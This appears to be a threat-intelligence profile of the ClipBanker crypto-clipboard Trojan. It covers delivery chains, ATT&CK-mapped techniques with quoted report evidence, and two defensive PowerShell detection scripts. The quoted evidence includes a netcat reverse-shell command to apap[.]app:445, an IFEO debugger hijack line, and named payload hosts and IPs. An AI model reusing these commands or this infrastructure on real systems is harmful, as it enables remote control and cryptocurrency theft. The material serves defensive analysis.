
ClipBanker

ClipBanker is a clipboard-hijacking cryptocurrency theft Trojan that monitors the victim’s clipboard for cryptocurrency wallet addresses and replaces them with attacker-controlled addresses. Across the provided reporting, it is consistently described as targeting crypto assets and wallet formats spanning numerous blockchain networks, including Bitcoin, Ethereum, Solana, Monero, Dogecoin, TRON, Ripple, Litecoin and many others.

Observed delivery and execution chains include fake software downloads, trojanized installers, phishing and ClickFix-style lures, fake CAPTCHA/reCAPTCHA verification pages, MSHTA-driven infection chains, SourceForge-hosted fake Microsoft Office downloads, and a fake GitHub repository distributing a trojanized Proxifier installer. In one SourceForge campaign, AutoIt-based components injected a miner and ClipBanker, while additional tooling established persistence, Telegram-based telemetry exfiltration, and a reverse shell to apap[.]app:445. In another campaign, the final ClipBanker payload was injected into fontdrvhost.exe after a long fileless chain involving Defender exclusions, in-memory PowerShell, registry-stored scripts, scheduled tasks, and payload retrieval from Pastebin-like services and GitHub.

Persistence mechanisms directly mentioned include Windows registry Run keys, scheduled tasks, App Paths registry hijacking, services, Image File Execution Options debugger abuse, WMI event filters/consumers, and registry-stored PowerShell launched at logon. One Kaspersky compromise-assessment case identified a ClipBanker variant persisting via HKU\S-1-5-21-[REDACTED]-500\Software\Microsoft\Windows\CurrentVersion\Run\9Er6IIp on a user workstation. Bitdefender also reported a ClipBanker chain using a remote HTA from asd[.]s7610rir[.]pw/win/checking[.]hta, downloading checking.ps1 from 185[.]208[.]159[.]199 and additional payloads including ichigo-lite.ps1 and del.ps1 from 87[.]96[.]21[.]84, with scheduled task names masquerading as legitimate services such as Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1237.

Implementation details in the content include C++/MinGW builds, AutoIt-based loaders/injectors, and variants that may avoid network communication entirely once deployed, focusing solely on clipboard monitoring and address substitution. ClipBanker also appears as a module within LummaC2/LummaStealer-related activity, where it performs wallet-address replacement. It is additionally referenced in campaigns associated with ViperSoftX operators, alongside QuasarRAT and PureRAT, for cryptocurrency wallet theft and remote control.

Victimology in the provided material centers on cryptocurrency users and financially motivated campaigns. Kaspersky’s 2024 financial threat reporting states ClipBanker accounted for 62.9% of users attacked by financial PC malware in 2024. Campaign telemetry cited in the content includes more than 2,000 encountered users in a trojanized Proxifier campaign, mainly in India and Vietnam, and 4,604 users exposed to the SourceForge fake Office campaign, with 90% of potential victims in Russia.
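The substitution behaviour described above (an address the user copied replaced by an attacker-controlled address of the same chain) can be watched for from the user side. The PowerShell below is an added example written for this page, not code from Mallory or from any of the vendor reports it quotes. It assumes Windows PowerShell 5.1 or later (for `Get-Clipboard -Raw`); the address format patterns, the three-second window and the sample addresses are the example's own assumptions, not indicators from the reporting.

```powershell
# Clipboard-swap watcher for the behaviour ClipBanker is described as having:
# a wallet address replaced by a different address of the same chain shortly
# after the user copied it. Added example; assumes Windows PowerShell 5.1+.

# Format patterns are this example's assumptions (first match wins; the broad
# base58 Solana pattern is last so it cannot shadow the more specific ones).
$WalletPatterns = [ordered]@{
    Ethereum = '^0x[0-9a-fA-F]{40}$'
    Bitcoin  = '^(bc1[ac-hj-np-z02-9]{25,62}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$'
    Litecoin = '^(ltc1[ac-hj-np-z02-9]{25,62}|[LM][a-km-zA-HJ-NP-Z1-9]{26,33})$'
    Dogecoin = '^D[5-9A-HJ-NP-U][a-km-zA-HJ-NP-Z1-9]{32}$'
    Tron     = '^T[a-km-zA-HJ-NP-Z1-9]{33}$'
    Ripple   = '^r[a-km-zA-HJ-NP-Z1-9]{24,34}$'
    Monero   = '^[48][0-9AB][a-km-zA-HJ-NP-Z1-9]{93}$'
    Solana   = '^[a-km-zA-HJ-NP-Z1-9]{32,44}$'
}

function Get-WalletChain {
    # Return the chain name whose pattern matches, or $null for non-address text.
    param([string]$Text)
    $t = $Text.Trim()
    foreach ($chain in $WalletPatterns.Keys) {
        # -cmatch: base58/bech32 classes are case-sensitive, and -match is not.
        if ($t -cmatch $WalletPatterns[$chain]) { return $chain }
    }
    return $null
}

function Test-AddressSwap {
    # A hijack looks like: previous and current clipboard text are both addresses
    # of the same chain, they differ, and the change came within a short window.
    param([string]$Previous, [string]$Current, [double]$ElapsedSeconds, [double]$WindowSeconds = 3)
    $p = Get-WalletChain $Previous
    $c = Get-WalletChain $Current
    return [bool]($p -and $c -and ($p -eq $c) -and ($Previous.Trim() -cne $Current.Trim()) -and ($ElapsedSeconds -le $WindowSeconds))
}

function Watch-Clipboard {
    # Poll the clipboard and warn on a same-chain address swap. Read-only.
    param([int]$Seconds = 300, [int]$PollMs = 250)
    $last = ''
    $lastTime = Get-Date
    $stop = (Get-Date).AddSeconds($Seconds)
    while ((Get-Date) -lt $stop) {
        $now  = Get-Date
        $text = [string](Get-Clipboard -Raw -ErrorAction SilentlyContinue)
        if ($text -and ($text -cne $last)) {
            $elapsed = ($now - $lastTime).TotalSeconds
            if (Test-AddressSwap -Previous $last -Current $text -ElapsedSeconds $elapsed) {
                Write-Warning ('{0}: {1} address changed {2:N1}s after copy: {3} -> {4}' -f $now, (Get-WalletChain $text), $elapsed, $last, $text)
            }
            $last = $text
            $lastTime = $now
        }
        Start-Sleep -Milliseconds $PollMs
    }
}

# Constructed dry run (no clipboard access): a copied Bitcoin address replaced
# 0.8 s later by a different Bitcoin address is flagged; a later change to an
# Ethereum address is not, because the chain differs.
$copied  = '1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2'
$swapped = '3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy'
Test-AddressSwap -Previous $copied  -Current $swapped -ElapsedSeconds 0.8                 # True
Test-AddressSwap -Previous $swapped -Current ('0x' + ('ab' * 20)) -ElapsedSeconds 0.8     # False
# To watch the live clipboard for five minutes: Watch-Clipboard -Seconds 300
```

The watcher only sees what the clipboard holds when it polls, so a swap and a swap-back inside one poll interval would be missed; the interval is a trade-off against CPU use. The heuristic is deliberately narrow (same chain, different address, short window) so that a user pasting two different addresses of their own is not flagged unless they do it within the window.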


MITRE ATT&CK

Techniques & procedures

31 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

2 techniques
T1583 Acquire Infrastructure (evidence: 1)

Recently, we noticed a rather unique scheme for distributing malware that exploits SourceForge... Pages like that are well-indexed by search engines and appear in their search results.

T1608.006 SEO Poisoning (evidence: 1)

A user searches for “Proxifier” on a popular search engine, and one of the top results points directly to the malicious GitHub repository ... The attackers have been actively pushing their malicious GitHub repository up through search engine results.

Execution

7 techniques
T1053.005 Scheduled Task (evidence: 2)

The role of this script is to ensure Windows Defender exclusions and persistence... The scheduled task names masquerade as services that sound legitimate.

T1059 Command and Scripting Interpreter (evidence: 1)

This essentially creates a remote command line with apap[.]app:445 as the C2 server.

T1059.001 PowerShell (evidence: 3)

the VB script runs a PowerShell interpreter to download and execute a batch file, confvk, from GitHub.

T1059.003 Windows Command Shell (evidence: 1)

This file contains the password for the RAR archive. It also unpacks malicious files and runs the next-stage script.

T1059.005 Visual Basic (evidence: 2)

The installer then executes an embedded Visual Basic script.

T1204 User Execution (evidence: 1)

Many of the attack chains presented in this article rely on user interaction... users are manipulated through social engineering into willingly executing malicious commands copied to the clipboard.

T1574.001 DLL (evidence: 1)

Icon.dll: clean dynamic-link library with a compressed AutoIt script appended to it. Kape.dll: clean dynamic-link library with a compressed AutoIt script appended to it... These scripts execute Input.exe (the AutoIt interpreter), passing the paths to Icon.dll and Kape.dll.

Persistence

6 techniques
T1053.005 Scheduled Task (evidence: 2)

The role of this script is to ensure Windows Defender exclusions and persistence... The scheduled task names masquerade as services that sound legitimate.

T1112 Modify Registry (evidence: 2)

The PowerShell script handles several key tasks: it ... stores an encoded script inside a registry key at HKLM\SOFTWARE\System::Config.

T1543.003 Windows Service (evidence: 1)

Then confvz creates services named NetworkConfiguration and PerformanceMonitor to autostart the batch files, and a service named Update to directly run the AutoIt interpreter

T1546.003 Windows Management Instrumentation Event Subscription (evidence: 1)

Using the built-in WMIC utility, an event filter is created to trigger a handler every 80 seconds... The handler executes the following command: ShellExperienceHost.exe --ssl apap[.]app 445 -e cmd.exe

T1546.012 Image File Execution Options Injection (evidence: 1)

Additionally, as a backup autostart method, confvz adds this registry key: "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe" :: Debugger = "%WINDIR%\System32\cmd.exe /c start start.exe"

T1547.001 Registry Run Keys / Startup Folder (evidence: 3)

...a variant of the ClipBanker stealer that had established persistence on the system through the registry key HKU\S-1-5-21-[REDACTED]-500\Software\Microsoft\Windows\CurrentVersion\Run\9Er6IIp.
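The persistence mechanisms listed in the family description (Run keys, scheduled tasks, services, IFEO Debugger values, WMI event filters and consumers) and the Run-key, service, WMI and IFEO evidence in this Persistence section can be triaged on a suspect host with the PowerShell below. It is an added example written for this page, not code from Mallory or from the vendor reports quoted here. It assumes an elevated Windows PowerShell 5.1 or later session on the host under review and only reads configuration; the heuristics it applies (user-writable paths, script interpreters, random-looking value names, a small known-benign WMI list) are the example's own assumptions, not indicators from the reporting.

```powershell
# Persistence triage for the mechanisms described in ClipBanker reporting:
# Run keys (including per-user HKU hives), IFEO Debugger values, WMI event
# subscriptions, services and scheduled tasks. Read-only: nothing is changed.
# Added example; assumes an elevated Windows PowerShell 5.1+ session.

# Heuristics below are this example's own assumptions, not report indicators.
$UserWritable = '(?i)\\(AppData|Temp|ProgramData|Users\\Public|Downloads)\\'
$Interpreters = '(?i)\b(powershell|pwsh|mshta|wscript|cscript|cmd|rundll32|regsvr32)(\.exe)?\b'
$RandomName   = '^(?=.*\d)(?=.*[a-z])(?=.*[A-Z])[A-Za-z0-9]{5,12}$'   # cf. the Run value name 9Er6IIp
$KnownWmi     = @('SCM Event Log Filter', 'SCM Event Log Consumer', 'BVTFilter', 'BVTConsumer')

function New-Finding {
    param([string]$Source, [string]$Location, [string]$Command, [bool]$Suspicious)
    [PSCustomObject]@{ Source = $Source; Location = $Location; Command = $Command; Suspicious = $Suspicious }
}

function Test-SuspiciousCommand {
    param([string]$Command)
    if (-not $Command) { return $false }
    return ($Command -match $UserWritable) -or ($Command -match $Interpreters)
}

function Get-RunKeyFindings {
    $paths = @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
               'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
               'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
               'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce')
    # Walk every loaded user hive as well (HKU\S-1-5-21-...), where the quoted case persisted.
    if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
    }
    foreach ($hive in (Get-ChildItem -Path 'HKU:\' -ErrorAction SilentlyContinue)) {
        if ($hive.PSChildName -match '^S-1-5-21-\d+-\d+-\d+-\d+$') {
            $paths += "HKU:\$($hive.PSChildName)\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
        }
    }
    foreach ($p in $paths) {
        $key = Get-Item -Path $p -ErrorAction SilentlyContinue
        if (-not $key) { continue }
        foreach ($name in $key.GetValueNames()) {
            $cmd  = [string]$key.GetValue($name)
            $flag = (Test-SuspiciousCommand $cmd) -or ($name -cmatch $RandomName)
            New-Finding -Source 'RunKey' -Location "$p\$name" -Command $cmd -Suspicious $flag
        }
    }
}

function Get-IfeoFindings {
    # Any Debugger value under IFEO redirects execution of that image; each one deserves review.
    $ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
    foreach ($sub in (Get-ChildItem -Path $ifeo -ErrorAction SilentlyContinue)) {
        $dbg = [string]$sub.GetValue('Debugger')
        if ($dbg) { New-Finding -Source 'IFEO' -Location "$($sub.PSChildName)\Debugger" -Command $dbg -Suspicious $true }
    }
}

function Get-WmiSubscriptionFindings {
    # Command-line and script consumers are rare on a clean host; list them with their filters.
    $ns = 'root\subscription'
    foreach ($c in (Get-CimInstance -Namespace $ns -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue)) {
        New-Finding -Source 'WMI' -Location "CommandLineEventConsumer\$($c.Name)" -Command ([string]$c.CommandLineTemplate) -Suspicious ($c.Name -notin $KnownWmi)
    }
    foreach ($c in (Get-CimInstance -Namespace $ns -ClassName ActiveScriptEventConsumer -ErrorAction SilentlyContinue)) {
        New-Finding -Source 'WMI' -Location "ActiveScriptEventConsumer\$($c.Name)" -Command ([string]$c.ScriptText) -Suspicious $true
    }
    foreach ($f in (Get-CimInstance -Namespace $ns -ClassName __EventFilter -ErrorAction SilentlyContinue)) {
        # A polling query (WITHIN n / __TimerEvent) is the periodic trigger the quoted report describes.
        New-Finding -Source 'WMI' -Location "__EventFilter\$($f.Name)" -Command ([string]$f.Query) -Suspicious ($f.Name -notin $KnownWmi)
    }
}

function Get-ServiceFindings {
    foreach ($svc in (Get-CimInstance -ClassName Win32_Service)) {
        $cmd = [string]$svc.PathName
        if (Test-SuspiciousCommand $cmd) { New-Finding -Source 'Service' -Location $svc.Name -Command $cmd -Suspicious $true }
    }
}

function Get-TaskFindings {
    foreach ($t in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        foreach ($a in $t.Actions) {
            $cmd = ('{0} {1}' -f $a.Execute, $a.Arguments).Trim()
            if (Test-SuspiciousCommand $cmd) {
                New-Finding -Source 'ScheduledTask' -Location "$($t.TaskPath)$($t.TaskName)" -Command $cmd -Suspicious $true
            }
        }
    }
}

$findings = @(Get-RunKeyFindings) + @(Get-IfeoFindings) + @(Get-WmiSubscriptionFindings) +
            @(Get-ServiceFindings) + @(Get-TaskFindings)
$findings | Where-Object Suspicious | Sort-Object Source | Format-Table -AutoSize -Wrap
```

Expect noise: legitimate software registers services and tasks from ProgramData, and Windows ships a few tasks that invoke cmd.exe, so the flagged list is a review queue rather than a verdict. Task names that imitate built-in maintenance tasks (the reporting cites one modelled on "Optimize Start Menu Cache Files") are best checked by comparing their TaskPath and action against the real task under \Microsoft\Windows. Drop `Where-Object Suspicious` to see every entry the functions collected.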

Privilege Escalation

6 techniques
T1053.005 Scheduled Task (evidence: 2)

The role of this script is to ensure Windows Defender exclusions and persistence... The scheduled task names masquerade as services that sound legitimate.

T1055 Process Injection (evidence: 2)

Icon.dll restarts the AutoIt interpreter and injects a miner into it, while Kape.dll does the same but injects ClipBanker.

T1543.003 Windows Service (evidence: 1)

Then confvz creates services named NetworkConfiguration and PerformanceMonitor to autostart the batch files, and a service named Update to directly run the AutoIt interpreter

T1546.003 Windows Management Instrumentation Event Subscription (evidence: 1)

Using the built-in WMIC utility, an event filter is created to trigger a handler every 80 seconds... The handler executes the following command: ShellExperienceHost.exe --ssl apap[.]app 445 -e cmd.exe

T1546.012 Image File Execution Options Injection (evidence: 1)

Additionally, as a backup autostart method, confvz adds this registry key: "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe" :: Debugger = "%WINDIR%\System32\cmd.exe /c start start.exe"

T1547.001 Registry Run Keys / Startup Folder (evidence: 3)

...a variant of the ClipBanker stealer that had established persistence on the system through the registry key HKU\S-1-5-21-[REDACTED]-500\Software\Microsoft\Windows\CurrentVersion\Run\9Er6IIp.

Stealth

10 techniques
T1027 Obfuscated Files or Information (evidence: 2)

The HTA decodes the next payload from an array of character codes and launches it... The downloaded PowerShell script is heavily obfuscated... We observed obfuscation techniques unique to each campaign, aiming to mask keywords that trigger alerts in EDRs and SIEMs.

T1027.001 Binary Padding (evidence: 1)

Attackers use the file pumping technique to inflate the file size by appending junk data. The file in question was padded with null bytes.

T1036 Masquerading (evidence: 3)

The downloaded archive contains another password-protected archive, installer.zip... Inside installer.zip is a file named installer.msi. This is a Windows Installer file that exceeds 700 megabytes. Apparently, the large size is intended to convince users they are looking at a genuine software installer.

T1055 Process Injection (evidence: 2)

Icon.dll restarts the AutoIt interpreter and injects a miner into it, while Kape.dll does the same but injects ClipBanker.

T1140 Deobfuscate/Decode Files or Information (evidence: 1)

The script block contains a minimal JavaScript loader that implements a Base64 decoding function... The main function decodes and executes the embedded script.

T1218.005 Mshta (evidence: 2)

The tool is MSHTA, short for Microsoft HTML Application Host, a built-in Windows utility that can run scripts from local files and remote internet locations... Attackers have been using it to deliver some of today’s most harmful malware... All use MSHTA as a stepping stone during early or middle stages of infection.

T1497.001 System Checks (evidence: 1)

the script checks for processes associated with antivirus software, security solutions, virtual environments, and research tools. If it detects anything like that, it deletes itself.

T1564.001 Hidden Files and Directories (evidence: 1)

This was done after adding the malware’s folder to Windows Defender exclusions and applying hidden and system attributes to the file to hide it from regular users.

T1564.003 Hidden Window (evidence: 1)

First, it sets the MSHTA window to 1x1 pixels, starts it minimized, and hides it from the taskbar to evade detection.

T1574.001 DLL (evidence: 1)

Icon.dll: clean dynamic-link library with a compressed AutoIt script appended to it. Kape.dll: clean dynamic-link library with a compressed AutoIt script appended to it... These scripts execute Input.exe (the AutoIt interpreter), passing the paths to Icon.dll and Kape.dll.

Defense Impairment

1 technique
T1112 Modify Registry (evidence: 2)

The PowerShell script handles several key tasks: it ... stores an encoded script inside a registry key at HKLM\SOFTWARE\System::Config.

Discovery

2 techniques
T1082 System Information Discovery (evidence: 1)

The message contains system information, the infected device’s external IP address and country, CPU name, operating system, installed antivirus, username, and computer name.

T1497.001 System Checks (evidence: 1)

the script checks for processes associated with antivirus software, security solutions, virtual environments, and research tools. If it detects anything like that, it deletes itself.

Collection

2 techniques
T1115 Clipboard Data (evidence: 4)

ClipBanker is a malware family that replaces cryptocurrency wallet addresses in the clipboard with the attackers’ own.

T1560 Archive Collected Data (evidence: 1)

The downloaded archive contains another password-protected archive, installer.zip, and a Readme.txt file with the password.

Command and Control

3 techniques
T1071 Application Layer Protocol (evidence: 1)

One of the PowerShell scripts sends a message to a certain chat using the Telegram API.

T1105 Ingress Tool Transfer (evidence: 3)

the VB script runs a PowerShell interpreter to download and execute a batch file, confvk, from GitHub... The other PowerShell script downloads another batch file, confvz

T1219 Remote Access Tools (evidence: 1)

ShellExperienceHost.exe is the netcat executable from the malicious archive. The arguments above make the utility establish an encrypted connection with the C2 server apap[.]app on port 445 and launch a command-line interpreter with redirected input/output through that connection.

Other

2 techniques
T1562.001 Disable or Modify Tools (evidence: 3)

This was done after adding the malware’s folder to Windows Defender exclusions and applying hidden and system attributes to the file to hide it from regular users.

T1562 Impair Defenses (evidence: 1)

The final, deobfuscated version of the PowerShell script consists of two parts. The first one is an AMSI bypass by patching clr.dll...

INDICATORS OF COMPROMISE

IOCs tracked for this family

48 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network
20 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
10 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
18 tracked

Other indicator types observed in public reporting.
